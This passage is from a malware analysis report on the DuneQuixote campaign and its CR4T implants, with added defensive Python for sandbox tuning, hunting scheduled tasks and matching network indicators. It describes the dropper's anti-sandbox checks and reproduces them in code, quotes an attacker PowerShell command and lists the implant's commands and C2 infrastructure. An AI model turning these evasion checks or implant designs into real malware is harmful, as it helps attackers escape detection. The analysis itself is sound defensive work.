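TAMPERED_SPECS = CLEAN_SPECS + [(b".textbss", 0x1000, 0x5000, 0x1000, 0x3C00,
                                 CODE | IMAGE_SCN_MEM_WRITE)]

if __name__ == "__main__":
    for label, entry, specs in (("clean", 0x1100, CLEAN_SPECS), ("tampered", 0x5020, TAMPERED_SPECS)):
        print(label, triage(build_sample_image(entry, specs)))
```

On a real file, `triage(open(path, "rb").read())` is enough; the findings are heuristics to prioritise a signature check and a diff against the vendor's pristine installer, not a verdict on their own.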
  1611. <ul>
  1612. <li>a debugger is present in the system;</li>
  1613. <li>known research or monitoring tools are among running processes;</li>
  1614. <li><em>explorer.exe</em> process has more than two instances;</li>
  1615. <li>any of the following processes are running:
  1616. <ul>
  1617. <li>&#8220;python.exe&#8221;</li>
  1618. <li>&#8220;taskmgr.exe&#8221;</li>
  1619. <li>&#8220;procmon.exe&#8221;</li>
  1620. <li>&#8220;resmon.exe&#8221;</li>
  1621. <li>&#8220;eventvwr.exe&#8221;</li>
  1622. <li>&#8220;process_hacker.exe&#8221;</li>
  1623. </ul>
  1624. </li>
  1625. <li>less than 8 GB RAM available;</li>
  1626. <li>the position of the cursor does not change over a certain timeframe;</li>
  1627. <li>disk capacity is less than 40 GB.</li>
  1628. </ul>
  1629. <p>If any of these conditions is met, the check routine returns 1, and this return value feeds into the decryption of the C2 server address: it causes the first &#8220;h&#8221; of the C2 URL (&#8220;<em>https</em>&#8220;) to be dropped, leaving &#8220;<em>ttps</em>&#8220;. The resulting URL has no valid scheme, so no connection to the C2 server is ever established, and the real address never shows up in the network traces an automated sandbox would capture.</p>
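For sandbox engineers who want this family to detonate, the following added Python (not the dropper's code) evaluates the conditions above against a description of an analysis VM and reproduces the &#8220;h&#8221;-dropping gate. The `collect_facts_windows` helper gathers the same facts on a real Windows guest with the standard library only; the two-second cursor interval, reading total rather than free RAM and checking the C: drive are assumptions, as the sample's exact parameters are not published:

```python
import ctypes
import shutil
import subprocess
import sys
import time
from typing import Dict, List

GIB = 1024 ** 3
WATCHED_PROCESSES = {"python.exe", "taskmgr.exe", "procmon.exe", "resmon.exe",
                     "eventvwr.exe", "process_hacker.exe"}


def evaluate(facts: Dict) -> List[str]:
    """Return the conditions from the list above that the described environment trips.
    facts keys: debugger, processes, ram_bytes, disk_bytes, cursor_moved."""
    tripped: List[str] = []
    procs = [p.lower() for p in facts.get("processes", [])]
    if facts.get("debugger", False):
        tripped.append("debugger present")
    seen = sorted(set(procs) & WATCHED_PROCESSES)
    if seen:
        tripped.append("analysis tooling running: " + ", ".join(seen))
    if procs.count("explorer.exe") > 2:
        tripped.append("more than two explorer.exe instances")
    if facts.get("ram_bytes", 0) < 8 * GIB:
        tripped.append("less than 8 GB of RAM")
    if facts.get("disk_bytes", 0) < 40 * GIB:
        tripped.append("disk smaller than 40 GB")
    if not facts.get("cursor_moved", False):
        tripped.append("cursor did not move")
    return tripped


def dropper_verdict(facts: Dict) -> int:
    """1 if any check trips (the value the article says feeds C2 decryption), else 0."""
    return 1 if evaluate(facts) else 0


def gate_c2_url(url: str, verdict: int) -> str:
    """Model of the described gating: a verdict of 1 drops the leading 'h' of https://."""
    return url[1:] if verdict == 1 and url.startswith("h") else url


def collect_facts_windows(cursor_wait_s: float = 2.0) -> Dict:
    """Best-effort fact collection on a Windows guest. The cursor interval, the use of
    total physical memory and the C: drive are assumptions about the sample's checks."""
    if sys.platform != "win32":
        raise RuntimeError("collect_facts_windows only runs on Windows")
    k32, u32 = ctypes.windll.kernel32, ctypes.windll.user32

    class MEMORYSTATUSEX(ctypes.Structure):
        _fields_ = [("dwLength", ctypes.c_ulong), ("dwMemoryLoad", ctypes.c_ulong)] + \
                   [(n, ctypes.c_ulonglong) for n in ("ullTotalPhys", "ullAvailPhys",
                    "ullTotalPageFile", "ullAvailPageFile", "ullTotalVirtual",
                    "ullAvailVirtual", "ullAvailExtendedVirtual")]

    class POINT(ctypes.Structure):
        _fields_ = [("x", ctypes.c_long), ("y", ctypes.c_long)]

    mem = MEMORYSTATUSEX()
    mem.dwLength = ctypes.sizeof(mem)
    k32.GlobalMemoryStatusEx(ctypes.byref(mem))
    p1, p2 = POINT(), POINT()
    u32.GetCursorPos(ctypes.byref(p1))
    time.sleep(cursor_wait_s)
    u32.GetCursorPos(ctypes.byref(p2))
    out = subprocess.run(["tasklist", "/FO", "CSV", "/NH"], capture_output=True, text=True).stdout
    processes = [line.split('","')[0].strip('"') for line in out.splitlines() if line.startswith('"')]
    return {"debugger": bool(k32.IsDebuggerPresent()),
            "processes": processes,
            "ram_bytes": mem.ullTotalPhys,
            "disk_bytes": shutil.disk_usage("C:\\").total,
            "cursor_moved": (p1.x, p1.y) != (p2.x, p2.y)}


# Constructed facts for a typical default analysis VM versus a hardened one.
DEFAULT_VM = {"debugger": False, "processes": ["explorer.exe", "procmon.exe", "python.exe"],
              "ram_bytes": 4 * GIB, "disk_bytes": 30 * GIB, "cursor_moved": False}
HARDENED_VM = {"debugger": False, "processes": ["explorer.exe", "chrome.exe"],
               "ram_bytes": 16 * GIB, "disk_bytes": 120 * GIB, "cursor_moved": True}

if __name__ == "__main__":
    facts = collect_facts_windows() if sys.platform == "win32" else DEFAULT_VM
    for reason in evaluate(facts):
        print("would trip:", reason)
    print(gate_c2_url("https://c2.example.invalid/", dropper_verdict(facts)))
```

Note that a guest passing every check still reveals nothing about the C2 if the dropper was renamed, because the filename-keyed decryption of the first dropper still applies.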
  1630. <h2 id="memory-only-cr4t-implant">Memory-only CR4T implant</h2>
  1631. <p>The &#8220;CR4T&#8221; implant is designed with the primary goal of granting attackers access to a console for command line execution on the victim&#8217;s machine. Additionally, it facilitates the download, upload, and modification of files. The malware carries a PDB string in its code:</p><pre class="crayon-plain-tag">"C:\Users\user\Desktop\code\CR4T\x64\Release\CR4T.pdb"</pre><p>
  1632. That&#8217;s why we dubbed it &#8220;CR4T&#8221;.</p>
  1633. <p>Upon execution by the dropper, the implant initiates a <em>cmd.exe</em> process in a hidden window and establishes two named pipes to enable inter-process communication. It then configures the user agent for communication with the C2 server, embedding the hardcoded value &#8220;TroubleShooter&#8221; as the user agent name for requests to the C2.</p>
  1634. <div id="attachment_112432" style="width: 664px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122917/Dune_Quixote_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112432" class="size-full wp-image-112432" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122917/Dune_Quixote_05.png" alt="User-agent string" width="654" height="132" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122917/Dune_Quixote_05.png 654w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122917/Dune_Quixote_05-300x61.png 300w" sizes="(max-width: 654px) 100vw, 654px" /></a><p id="caption-attachment-112432" class="wp-caption-text">User-agent string</p></div>
  1635. <p>After that, the implant retrieves the computer name of the infected host as well as the username of the current user. Then it establishes a connection to the C2 server. This session provides interactive access to the command line interface of the victim&#8217;s machine via the earlier mentioned named pipes. Commands and their outputs are encoded using Base64 before being sent and decoded after receiving.</p>
  1636. <p>After the connection is established, the implant idles until it receives an initial command from the C2 operator. Each command is a single byte mapped to a specific action on the infected system. These single-character commands suggest an English-speaking developer or operator rather than a Spanish-speaking one, e.g. &#8220;D&#8221; for Download and &#8220;U&#8221; for Upload, where a Spanish speaker might have chosen &#8220;Cargar&#8221;.</p>
  1637. <table width="100%">
  1638. <tbody>
  1639. <tr>
  1640. <td width="25%"><strong>Command</strong></td>
  1641. <td width="75%"><strong>Functionality</strong></td>
  1642. </tr>
  1643. <tr>
  1644. <td>&#8216;C'(0x43)</td>
  1645. <td>Provide access to the command line interface via a named pipe.</td>
  1646. </tr>
  1647. <tr>
  1648. <td>&#8216;D'(0x44)</td>
  1649. <td>Download file from the C2</td>
  1650. </tr>
  1651. <tr>
  1652. <td>&#8216;U'(0x55)</td>
  1653. <td>Upload file to the C2</td>
  1654. </tr>
  1655. <tr>
  1656. <td>&#8216;S'(0x53)</td>
  1657. <td>Sleep</td>
  1658. </tr>
  1659. <tr>
  1660. <td>&#8216;R'(0x52)</td>
  1661. <td>Exit process</td>
  1662. </tr>
  1663. <tr>
  1664. <td>&#8216;T'(0x57)</td>
  1665. <td>Write to a file (T here possibly stands for a file-write <em>task</em>). Note that 0x57 is the ASCII code for &#8220;W&#8221;, whereas &#8220;T&#8221; is 0x54, so one of the two values in this row is a transcription error; &#8220;W&#8221; for Write would also fit the naming of the other commands.</td>
  1666. </tr>
  1667. </tbody>
  1668. </table>
  1669. <p>During our investigation, we discovered evidence of a PowerShell file that had been written to disk using the &#8220;T&#8221; command:</p><pre class="crayon-plain-tag">"powershell -c \"Get-ScheduledTask | Where-Object {$_.TaskName -like 'User_Feed_Sync*' -and $_.State -eq 'Running'} | Select-Object TaskName\"</pre><p>
  1670. The threat actor was attempting to list all scheduled tasks on the infected machine whose names begin with &#8220;<em>User_Feed_Sync</em>&#8220; and that were currently running. These scheduled tasks were probably created by the Golang version of CR4T for persistence.</p>
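An added example (not from the article or the actor's tooling) of turning this observation into a hunt over Task Scheduler definitions: parse the XML files under C:\Windows\System32\Tasks, or from a mounted disk image, and score each task on its name, hidden flag and action path. Windows itself registers a task named User_Feed_Synchronization-{GUID} that runs msfeedssync.exe, so a name match alone is a weak signal; the sample definitions, task names and paths below are constructed:

```python
import fnmatch
import os
import xml.etree.ElementTree as ET
from typing import Dict, Iterable, List, Tuple

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
NAME_PATTERNS = ("User_Feed_Sync*",)
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
ENCODED_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}


def parse_task(xml_text: str) -> Dict:
    """Pull author, hidden flag and Exec actions out of a Task Scheduler XML definition."""
    root = ET.fromstring(xml_text)
    actions = [(ex.findtext("t:Command", default="", namespaces=TASK_NS).strip(),
                ex.findtext("t:Arguments", default="", namespaces=TASK_NS).strip())
               for ex in root.findall(".//t:Actions/t:Exec", TASK_NS)]
    hidden = root.findtext("t:Settings/t:Hidden", default="false", namespaces=TASK_NS)
    return {"author": root.findtext("t:RegistrationInfo/t:Author", default="", namespaces=TASK_NS),
            "hidden": hidden.strip().lower() == "true",
            "actions": actions}


def assess(name: str, xml_text: str) -> List[str]:
    """Reasons a task deserves a look; an empty list means nothing stood out."""
    info = parse_task(xml_text)
    reasons = []
    if any(fnmatch.fnmatchcase(name, p) for p in NAME_PATTERNS):
        reasons.append("name matches " + "/".join(NAME_PATTERNS))
    if info["hidden"]:
        reasons.append("task is hidden")
    for cmd, args in info["actions"]:
        low_cmd = cmd.lower()
        if any(seg in low_cmd for seg in USER_WRITABLE):
            reasons.append("action runs from a user-writable path: " + cmd)
        if "powershell" in low_cmd and ENCODED_FLAGS & {t.lower() for t in args.split()}:
            reasons.append("PowerShell with an encoded command")
    return reasons


def hunt(tasks: Iterable[Tuple[str, str]]) -> List[Dict]:
    hits = []
    for name, xml_text in tasks:
        reasons = assess(name, xml_text)
        if reasons:
            hits.append({"name": name, "reasons": reasons})
    return hits


def load_tasks_dir(root: str = r"C:\Windows\System32\Tasks") -> List[Tuple[str, str]]:
    """Read definitions from disk or a mounted image: UTF-16 XML files without an
    extension, where the file name is the task name."""
    found = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            with open(os.path.join(dirpath, fn), encoding="utf-16", errors="replace") as fh:
                found.append((fn, fh.read()))
    return found


def task_xml(author: str, command: str, arguments: str = "", hidden: bool = False) -> str:
    # Constructed definitions in the real schema, limited to the elements the parser reads.
    return ("<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">"
            "<RegistrationInfo><Author>%s</Author></RegistrationInfo>"
            "<Settings><Hidden>%s</Hidden></Settings>"
            "<Actions Context=\"Author\"><Exec><Command>%s</Command><Arguments>%s</Arguments></Exec></Actions>"
            "</Task>") % (author, "true" if hidden else "false", command, arguments)


# Constructed sample set. The second entry mimics the task Windows itself registers for
# RSS feed synchronisation, which also matches the name pattern.
SAMPLE_TASKS = [
    ("User_Feed_Sync_7f3a", task_xml("victim-pc\\victim",
        r"C:\Users\victim\AppData\Roaming\Microsoft\Feeds\sync.exe", hidden=True)),
    ("User_Feed_Synchronization-{A1B2C3D4-0000-1111-2222-333344445555}",
        task_xml("victim-pc\\victim", r"C:\Windows\System32\msfeedssync.exe", "sync")),
    ("MicrosoftEdgeUpdateTaskMachineCore",
        task_xml("", r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe", "/c")),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_TASKS):
        print(hit["name"], "->", hit["reasons"])
```

The benign lookalike scores only on its name; the constructed malicious task also scores on being hidden and on running from AppData, which is the combination worth alerting on.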
  1671. <h2 id="memory-only-golang-cr4t-implant">Memory-only Golang CR4T implant</h2>
  1672. <p>We also discovered a Golang version of the CR4T implant, which shares similar capabilities with the C version and has a similar string related to the internal naming:</p>
  1673. <pre class="crayon-plain-tag">"C:/Users/user/Desktop/code/Cr4tInst/main.go"</pre>
  1674. <p>This variant provides a command line console for interaction with infected machines, as well as file download and upload capabilities. It also possesses the functionality to execute commands on the victim&#8217;s machine. A notable difference of this version is its ability to create scheduled tasks using the Golang <a href="https://github.com/go-ole/go-ole">Go-ole</a> library. This library leverages Windows Component Object Model (COM) object interfaces for interacting with the Task Scheduler service.</p>
  1675. <div id="attachment_112433" style="width: 716px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112433" class="size-full wp-image-112433" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06.png" alt=" CR4T using go-ole library" width="706" height="447" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06.png 706w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06-300x190.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06-553x350.png 553w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06-442x280.png 442w" sizes="(max-width: 706px) 100vw, 706px" /></a><p id="caption-attachment-112433" class="wp-caption-text">CR4T using go-ole library</p></div>
  1676. <p>The malware is also capable of achieving persistence through the <a href="https://cyberstruggle.org/2021/12/14/com-hijacking-for-persistence/" target="_blank" rel="noopener">COM object hijacking</a> technique. Finally, it uses the Telegram API for C2 communications, implemented with the public <a href="https://github.com/go-telegram-bot-api/telegram-bot-api" target="_blank" rel="noopener">Golang Telegram API</a> bindings. All interactions are similar to those of the C/C++ version.</p>
  1677. <h2 id="infrastructure">Infrastructure</h2>
  1678. <p>The infrastructure used in this campaign appears to be located in the US at two different commercial hosters.</p>
  1679. <table width="100%">
  1680. <tbody>
  1681. <tr>
  1682. <td width="28%"><strong>Domain</strong></td>
  1683. <td width="28%"><strong>IP</strong></td>
  1684. <td width="28%"><strong>First seen</strong></td>
  1685. <td width="16%"><strong>ASN</strong></td>
  1686. </tr>
  1687. <tr>
  1688. <td>commonline[.]space</td>
  1689. <td>135.148.113[.]161</td>
  1690. <td>2023-12-16 23:20</td>
  1691. <td>16276</td>
  1692. </tr>
  1693. <tr>
  1694. <td>userfeedsync[.]com</td>
  1695. <td>104.36.229[.]249</td>
  1696. <td>2024-01-10 07:27</td>
  1697. <td>395092</td>
  1698. </tr>
  1699. </tbody>
  1700. </table>
  1701. <h2 id="victims">Victims</h2>
  1702. <p>According to our telemetry, we discovered victims in the Middle East as early as February 2023. Later, starting on December 12, 2023, the droppers were uploaded to a semi-public malware scanning service more than 30 times through the end of January 2024. Most of these uploads also originated from the Middle East; the rest came from what we suspect are VPN exit nodes geolocated in South Korea, Luxembourg, Japan, Canada, the Netherlands and the US.</p>
  1703. <h2 id="conclusions">Conclusions</h2>
  1704. <p>The &#8220;DuneQuixote&#8221; campaign targets entities in the Middle East with an interesting array of tools designed for stealth and persistence. Through the deployment of memory-only implants and droppers masquerading as legitimate software, mimicking the Total Commander installer, the attackers demonstrate above average evasion capabilities and techniques. The discovery of both C/C++ and Golang versions of the CR4T implant highlights the adaptability and resourcefulness of the threat actors behind this campaign.</p>
  1705. <h2 id="indicators-of-compromise">Indicators of Compromise</h2>
  1706. <p><strong>DuneQuixote Droppers</strong><br />
  1707. <a href="https://opentip.kaspersky.com/3aaf7f7f0a42a1cf0a0f6c61511978d7/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">3aaf7f7f0a42a1cf0a0f6c61511978d7</a><br />
  1708. <a href="https://opentip.kaspersky.com/5759acc816274d38407038c091e56a5c/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5759acc816274d38407038c091e56a5c</a><br />
  1709. <a href="https://opentip.kaspersky.com/606fdee74ad70f76618007d299adb0a4/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">606fdee74ad70f76618007d299adb0a4</a><br />
  1710. <a href="https://opentip.kaspersky.com/5a04d9067b8cb6bcb916b59dcf53bed3/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5a04d9067b8cb6bcb916b59dcf53bed3</a><br />
  1711. <a href="https://opentip.kaspersky.com/48c8e8cc189eef04a55ecb021f9e6111/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">48c8e8cc189eef04a55ecb021f9e6111</a><br />
  1712. <a href="https://opentip.kaspersky.com/7b9e85afa89670f46f884bb3bce262b0/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">7b9e85afa89670f46f884bb3bce262b0</a><br />
  1713. <a href="https://opentip.kaspersky.com/4f29f977e786b2f7f483b47840b9c19d/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">4f29f977e786b2f7f483b47840b9c19d</a><br />
  1714. <a href="https://opentip.kaspersky.com/9d20cc7a02121b515fd8f16b576624ef/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">9d20cc7a02121b515fd8f16b576624ef</a><br />
  1715. <a href="https://opentip.kaspersky.com/4324cb72875d8a62a210690221cdc3f9/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">4324cb72875d8a62a210690221cdc3f9</a><br />
  1716. <a href="https://opentip.kaspersky.com/3cc77c18b4d1629b7658afbf4175222c/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">3cc77c18b4d1629b7658afbf4175222c</a><br />
  1717. <a href="https://opentip.kaspersky.com/6cfec4bdcbcf7f99535ee61a0ebae5dc/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">6cfec4bdcbcf7f99535ee61a0ebae5dc</a><br />
  1718. <a href="https://opentip.kaspersky.com/c70763510953149fb33d06bef160821c/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">c70763510953149fb33d06bef160821c</a><br />
  1719. <a href="https://opentip.kaspersky.com/f3988b8aaaa8c6a9ec407cf5854b0e3b/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">f3988b8aaaa8c6a9ec407cf5854b0e3b</a><br />
  1720. <a href="https://opentip.kaspersky.com/cf4bef8537c6397ba07de7629735eb4e/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">cf4bef8537c6397ba07de7629735eb4e</a><br />
  1721. <a href="https://opentip.kaspersky.com/1bba771b9a32f0aada6eaee64643673a/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">1bba771b9a32f0aada6eaee64643673a</a><br />
  1722. <a href="https://opentip.kaspersky.com/72c4d9bc1b59da634949c555b2a594b1/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">72c4d9bc1b59da634949c555b2a594b1</a><br />
  1723. <a href="https://opentip.kaspersky.com/cc05c7bef5cff67bc74fda2fc96ddf7b/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">cc05c7bef5cff67bc74fda2fc96ddf7b</a><br />
  1724. <a href="https://opentip.kaspersky.com/0fdbe82d2c8d52ac912d698bb8b25abc/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">0fdbe82d2c8d52ac912d698bb8b25abc</a><br />
  1725. <a href="https://opentip.kaspersky.com/9b991229fe1f5d8ec6543b1e5ae9beb4/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">9b991229fe1f5d8ec6543b1e5ae9beb4</a><br />
  1726. <a href="https://opentip.kaspersky.com/5e85dc7c6969ce2270a06184a8c8e1da/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5e85dc7c6969ce2270a06184a8c8e1da</a><br />
  1727. <a href="https://opentip.kaspersky.com/71a8b4b8d9861bf9ac6bd4b0a60c3366/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">71a8b4b8d9861bf9ac6bd4b0a60c3366</a><br />
  1728. <a href="https://opentip.kaspersky.com/828335d067b27444198365fac30aa6be/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">828335d067b27444198365fac30aa6be</a><br />
  1729. <a href="https://opentip.kaspersky.com/84ae9222c86290bf585851191007ba23/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">84ae9222c86290bf585851191007ba23</a><br />
  1730. <a href="https://opentip.kaspersky.com/450e589680e812ffb732f7e889676385/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">450e589680e812ffb732f7e889676385</a><br />
  1731. <a href="https://opentip.kaspersky.com/56d5589e0d6413575381b1f3c96aa245/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">56d5589e0d6413575381b1f3c96aa245</a><br />
  1732. <a href="https://opentip.kaspersky.com/258b7f20db8b927087d74a9d6214919b/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">258b7f20db8b927087d74a9d6214919b</a><br />
  1733. <a href="https://opentip.kaspersky.com/a4011d2e4d3d9f9fe210448dd19c9d9a/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">a4011d2e4d3d9f9fe210448dd19c9d9a</a><br />
  1734. <a href="https://opentip.kaspersky.com/b0e19a9fd168af2f7f6cf997992b1809/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">b0e19a9fd168af2f7f6cf997992b1809</a><br />
  1735. <a href="https://opentip.kaspersky.com/0d740972c3dff09c13a5193d19423da1/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">0d740972c3dff09c13a5193d19423da1</a><br />
  1736. <a href="https://opentip.kaspersky.com/a0802a787537de1811a81d9182be9e7c/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">a0802a787537de1811a81d9182be9e7c</a><br />
  1737. <a href="https://opentip.kaspersky.com/5200fa68b6d40bb60d4f097b895516f0/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5200fa68b6d40bb60d4f097b895516f0</a><br />
  1738. <a href="https://opentip.kaspersky.com/abf16e31deb669017e10e2cb8cc144c8/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">abf16e31deb669017e10e2cb8cc144c8</a><br />
  1739. <a href="https://opentip.kaspersky.com/f151be4e882352ec42a336ca6bff7e3d/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">f151be4e882352ec42a336ca6bff7e3d</a><br />
  1740. <a href="https://opentip.kaspersky.com/f1b6aa55ba3bb645d3fde78abda984f3/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">f1b6aa55ba3bb645d3fde78abda984f3</a><br />
  1741. <a href="https://opentip.kaspersky.com/00130e1e7d628c8b5e2f9904ca959cd7/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">00130e1e7d628c8b5e2f9904ca959cd7</a><br />
  1742. <a href="https://opentip.kaspersky.com/fb2b916e44abddd943015787f6a8dc35/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">fb2b916e44abddd943015787f6a8dc35</a><br />
  1743. <a href="https://opentip.kaspersky.com/996c4f78a13a8831742e86c052f19c20/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">996c4f78a13a8831742e86c052f19c20</a><br />
  1745. <a href="https://opentip.kaspersky.com/91472c23ef5e8b0f8dda5fa9ae9afa94/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">91472c23ef5e8b0f8dda5fa9ae9afa94</a><br />
  1746. <a href="https://opentip.kaspersky.com/135abd6f35721298cc656a29492be255/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">135abd6f35721298cc656a29492be255</a><br />
  1747. <a href="https://opentip.kaspersky.com/db786b773cd75483a122b72fdc392af6/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">db786b773cd75483a122b72fdc392af6</a></p>
  1748. <p><strong>Domains and IPs </strong><br />
  1749. <a href="https://opentip.kaspersky.com/commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">commonline[.]space</a><br />
  1750. <a href="https://opentip.kaspersky.com/g1sea23g.commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">g1sea23g.commonline[.]space</a><br />
  1751. <a href="https://opentip.kaspersky.com/tg1sea23g.commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">tg1sea23g.commonline[.]space</a><br />
  1752. <a href="https://opentip.kaspersky.com/telemetry.commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">telemetry.commonline[.]space</a><br />
  1753. <a href="https://opentip.kaspersky.com/e1awq1lp.commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">e1awq1lp.commonline[.]space</a><br />
  1754. <a href="https://opentip.kaspersky.com/mc.commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">mc.commonline[.]space</a><br />
  1755. <a href="https://opentip.kaspersky.com/userfeedsync.com/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">userfeedsync[.]com</a><br />
  1756. <a href="https://opentip.kaspersky.com/service.userfeedsync.com/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">service.userfeedsync[.]com</a><br />
  1757. <a href="https://opentip.kaspersky.com/telemetry.userfeedsync.com/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">telemetry.userfeedsync[.]com</a></p>
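<p>An added example (not from the article) of applying these indicators to proxy logs: match hosts against the apex domains (which cover the listed subdomains), direct connections to the two IPs, and the CR4T User-Agent. The log format and lines are constructed; the indicators are the ones published above:</p>

```python
import shlex
from typing import Dict, List
from urllib.parse import urlsplit

# Network indicators from the lists above, kept defanged exactly as published.
IOC_DOMAINS = {"commonline[.]space", "userfeedsync[.]com"}   # apex domains cover the listed subdomains
IOC_IPS = {"135.148.113[.]161", "104.36.229[.]249"}
IOC_USER_AGENTS = {"TroubleShooter"}                          # CR4T's hardcoded User-Agent


def refang(ioc: str) -> str:
    return ioc.replace("[.]", ".")


def host_matches(host: str, apex_domains) -> bool:
    """True for the apex itself and any subdomain, never for look-alike suffixes."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in apex_domains)


def parse_line(line: str) -> Dict:
    """Constructed proxy log format: ts client method url "user-agent" status."""
    ts, client, method, url, ua, status = shlex.split(line)
    return {"ts": ts, "client": client, "method": method, "url": url,
            "host": (urlsplit(url).hostname or "").lower(), "ua": ua, "status": int(status)}


def match_iocs(lines) -> List[Dict]:
    domains = {refang(d) for d in IOC_DOMAINS}
    ips = {refang(i) for i in IOC_IPS}
    hits = []
    for line in lines:
        rec = parse_line(line)
        reasons = []
        if host_matches(rec["host"], domains):
            reasons.append("host under IOC domain: " + rec["host"])
        if rec["host"] in ips:
            reasons.append("direct connection to IOC IP: " + rec["host"])
        if rec["ua"] in IOC_USER_AGENTS:
            reasons.append("CR4T user agent: " + rec["ua"])
        if reasons:
            hits.append({**rec, "reasons": reasons})
    return hits


# Constructed log lines; the hosts are the published IOCs, the clients are private addresses.
SAMPLE_LOG = [
    '2024-01-12T09:14:03Z 10.0.0.25 GET https://telemetry.commonline.space/feed "TroubleShooter" 200',
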